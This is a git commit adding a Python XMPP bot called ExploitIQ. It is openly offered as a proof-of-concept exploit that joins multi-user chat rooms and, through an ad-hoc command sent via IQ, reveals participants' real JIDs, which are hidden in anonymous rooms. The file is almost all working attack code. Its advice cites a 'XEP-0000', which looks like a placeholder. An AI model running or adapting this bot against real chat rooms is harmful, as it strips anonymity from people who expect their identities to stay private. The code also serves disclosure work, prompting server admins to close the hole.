Upload New File

2024-03-02 23:36:26 +00:00 · 2024-03-02 23:36:26 +00:00 · 5a6b5945dc
commit 5a6b5945dc
1 changed files with 124 additions and 0 deletions
--- a/iq_exploit.py
+++ b/iq_exploit.py
@ -0,0 +1,124 @@
+#!/usr/bin/env python3
+
+# Name: ExploitIQ
+# License: No license, Unlicensed, Public Domain.
+
+from getpass import getpass
+from argparse import ArgumentParser
+import logging
+import slixmpp
+
+
+class ExploitIQ(slixmpp.ClientXMPP):
+
+    """
+    ExploitIQ - Expose Full JID by MUC IQ.
+    """
+
+    def __init__(self, jid, password):
+        slixmpp.ClientXMPP.__init__(self, jid, password)
+        self.add_event_handler("disco_info", self.discovery)
+        self.add_event_handler("groupchat_direct_invite", self.on_groupchat_direct_invite)
+        self.add_event_handler("groupchat_invite", self.on_groupchat_invite)
+        self.add_event_handler("message", self.process_message)
+        self.add_event_handler("session_start", self.start)
+
+    async def start(self, event):
+        self.command_list()
+        self.send_presence()
+        await self['xep_0115'].update_caps()
+
+    async def discovery(self, DiscoInfo):
+        jid = DiscoInfo['from']
+        await self['xep_0115'].update_caps(jid=jid)
+
+    def on_groupchat_invite(self, message):
+        jid = message['groupchat_invite']['jid']
+        self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ')
+
+    def on_groupchat_direct_invite(self, message):
+        jid = message['groupchat_invite']['jid']
+        self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ')
+
+    def process_message(self, message):
+        if message['type'] in ('chat', 'normal'):
+            message_text = " ".join(message['body'].split())
+            message_lowercase = message_text.lower()
+            match message_lowercase:
+                case _ if message_lowercase.startswith('join '):
+                    jid = message_lowercase[5:]
+                    self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ')
+                case _:
+                    message_body = ('Send: `join <jid>` (JID has to be of groupchat.')
+                    message.reply(message_body).send()
+
+    def command_list(self):
+        self['xep_0050'].add_command(node='start',
+                                     name='Start',
+                                     handler=self._handle_start)
+        self['xep_0050'].add_command(node='about',
+                                     name='About',
+                                     handler=self._handle_about)
+
+    def _handle_start(self, iq, session):
+        jid = session['from'].bare
+        text_note = 'Is this you JID?\n{}'.format(jid)
+        session['notes'] = [['info', text_note]]
+        return session
+
+    def _handle_about(self, iq, session):
+        text_note = ('This software is a proof of concept to realize a '
+                     'privacy risk that results from sending IQ in MUC, '
+                     'which would allow exposure of participant JID.'
+                     '\n\n'
+                     'XMPP server administrators are encouraged to disable '
+                     'IQ in MUC and implement XEP-0000 which is more secure.')
+        session['notes'] = [['info', text_note]]
+        return session
+
+
+if __name__ == '__main__':
+    # Setup the command line arguments.
+    parser = ArgumentParser(description=ExploitIQ.__doc__)
+
+    # Output verbosity options.
+    parser.add_argument("-q", "--quiet", help="set logging to ERROR",
+                        action="store_const", dest="loglevel",
+                        const=logging.ERROR, default=logging.INFO)
+    parser.add_argument("-d", "--debug", help="set logging to DEBUG",
+                        action="store_const", dest="loglevel",
+                        const=logging.DEBUG, default=logging.INFO)
+
+    # JID and password options.
+    parser.add_argument("-j", "--jid", dest="jid",
+                        help="JID to use")
+    parser.add_argument("-p", "--password", dest="password",
+                        help="password to use")
+
+    args = parser.parse_args()
+
+    # Setup logging.
+    logging.basicConfig(level=args.loglevel,
+                        format='%(levelname)-8s %(message)s')
+
+    if args.jid is None:
+        args.jid = input("Username: ")
+    if args.password is None:
+        args.password = getpass("Password: ")
+
+    # Setup the bot and register plugins. Note that while plugins may
+    # have interdependencies, the order in which you register them does
+    # not matter.
+    xmpp = ExploitIQ(args.jid, args.password)
+    xmpp.register_plugin('xep_0030') # Service Discovery
+    xmpp.register_plugin('xep_0004') # Data Forms
+    xmpp.register_plugin('xep_0060') # Publish-Subscribe
+    xmpp.register_plugin('xep_0045') # Multi-User Chat
+    xmpp.register_plugin('xep_0050') # Ad-Hoc Commands
+    xmpp.register_plugin('xep_0115') # Entity Capabilities
+    xmpp.register_plugin('xep_0122') # Data Forms Validation
+    xmpp.register_plugin('xep_0199') # XMPP Ping
+
+    # Connect to the XMPP server and start processing XMPP stanzas.
+    xmpp.connect()
+    xmpp.process()